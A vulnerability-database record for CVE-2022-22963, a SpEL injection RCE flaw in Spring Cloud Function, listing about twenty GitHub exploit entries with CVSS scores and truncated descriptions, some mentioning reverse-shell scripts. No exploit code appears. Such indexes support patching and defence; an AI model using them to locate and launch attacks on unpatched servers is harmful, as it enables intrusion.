In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.
{"githubexploit": [{"lastseen": "2023-07-21T18:46:03", "description": "# CVE-2022-22963 Exploit\n\n## Description\n\n\nIn Spring Cloud Funct...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-15T21:39:20", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-03-24T18:08:12", "id": "61FC770E-836A-5901-B2CF-CE7181FEBED9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-19T08:44:29", "description": "# Spring Core RCE\nA Proof-of-Concept (**PoC**) of the **Spring C...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T14:29:24", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-07-18T13:48:00", "id": "19D93D49-F907-5A3B-9FA2-ED9EFE3A45E0", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-07-21T23:43:33", "description": "## CVE-2022-22963: Spring4Shell RCE Exploit\n\nThis is a python im...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-13T13:28:55", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-07-07T22:25:02", "id": "D1A30248-63E3-5F72-9EDD-1779A6F23FA7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-07-21T19:44:54", "description": "# SpringCloudFunction-Research\nCVE-2022-22963 research\n\n# \u74b0\u5883\n* v...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T17:06:55", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-07T10:59:37", "id": "2EBB728F-8FCC-57DB-8AC5-50BB5C51500E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-07-21T23:40:50", "description": "# CVE-2022-22963-Reverse-Shell-Exploit\nThis is a Python script t...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-21T06:14:35", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-03-21T06:16:01", "id": "5C2C6487-F3F5-580A-9A8C-34ABC1C16EB7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-07-21T23:19:30", "description": "# Exploit-for-CVE-2022-22963\n\nExploit using curl to get a revers...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-06-29T04:04:50", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-06-29T22:10:45", "id": "7D874F81-FBEE-512F-B206-D7CED2BA80B0", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-30T12:05:15", "description": "# CVE-2022-22963\n\nRemote Code Execution exploiting CVE-2022-2296...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-03T16:45:06", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-05-03T17:19:31", "id": "E00EE482-CF1E-5781-9A57-928FFA18D762", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-10-27T16:46:11", "description": "# CVE-2022-22963\nCVE-2022-22963 PoC \n\nSlight modified for Englis...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-21T22:10:16", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-09-27T23:19:20", "id": "4F0237BC-ABC7-5137-BF74-6CA614369115", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-07-24T23:02:58", "description": "# CVE-2022-22963\nCVE-2022-22963 Spring-Cloud-Function-SpEL_RCE_\u6f0f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-30T11:36:42", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-05-05T16:12:06", "id": "D71757FD-E7A3-525B-8B2B-FB1D6DC37D11", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-03-21T05:54:57", "description": "# CVE-2022-22963-Reverse-Shell-Exploit\nThis is a Python script t...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-21T05:11:50", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-03-21T05:49:33", "id": "7191AA24-D888-57E0-8B35-41D35E255E6F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-07-21T19:42:14", "description": "# Spring Cloud Function SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165\u6f0f\u6d1e\uff08CVE-2022-22963\uff09\r\n\r\n>Spring\u6846\u67b6...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-14T11:10:50", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-06-30T08:04:06", "id": "3389F104-810F-5B22-8F78-C961A94A8C27", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-07-21T23:36:42", "description": "# Spring Cloud Function Vulnerability (CVE-2022-22963) RCE\nThis ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-04-17T13:54:06", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-04-27T00:44:37", "id": "FE14C1D9-37CA-5446-B354-C8299FC7FAAC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-07-21T19:49:50", "description": "# CVE-2022-22963 RCE PoC\n\nMinimal example to reproduce CVE-2022-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-30T17:37:35", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-02-15T10:03:43", "id": "723B41AF-E5A8-5571-BA74-FA8924B88606", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-07-21T19:47:23", "description": "# Spring Cloud Function Vulnerability(CVE-2022-22963)\n\nVulnerabl...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T14:32:14", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-07-02T23:57:17", "id": "BD7F2851-5090-5010-8C27-4B3CCF48ADE1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-28T13:53:07", "description": "# CVE-2022-22963\nCVE-2022-22963 PoC \n\nSlight modified for Englis...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-30T05:04:24", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-09-28T11:37:30", "id": "82AB8274-DF0B-58B4-8C3C-3CE19E21A0C3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-07-21T19:48:05", "description": "# Spring Core RCE - CVE-2022-22963\n\n> Following Spring Cloud, on...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-30T19:07:35", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-04-18T13:31:19", "id": "3D40E0AE-D155-5852-986D-A5FF3880E230", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-07-21T19:48:00", "description": "# CVE-2022-22963\nCVE-2022-22963 PoC \n\nSlight modified for Englis...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T11:14:46", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-31T11:22:08", "id": "AD1045B7-6DFA-557C-81B2-18F96F0F68A2", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-07-21T19:46:09", "description": "# Spring Cloud Function SpEL - cve-2022-22963\n## Build\n```bash\n$...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-03T06:45:51", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-03T07:36:26", "id": "8D79D09C-1FB6-5C99-89C0-D839A4817791", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-05T15:16:05", "description": "# CVE-2022-22963\nTo run the vulnerable SpringBoot application ru...", "cvss3": {}, "published": "2022-03-30T15:49:32", "type": "githubexploit", "title": "Exploit for CVE-2022-22963", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-05T08:56:16", "id": "F340F3AE-7288-5EF0-85A3-DAB6576064D5", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2023-07-31T11:53:07", "description": "# CVE-2022-22963 Reverse Shell Exploit\n\nThis is a Python script ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-18T11:43:00", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-07-31T09:03:43", "id": "7899779A-3EFB-5F5A-A490-9D1DEB77503A", "href": "", "cvss": {"score": 7.5, "vector": 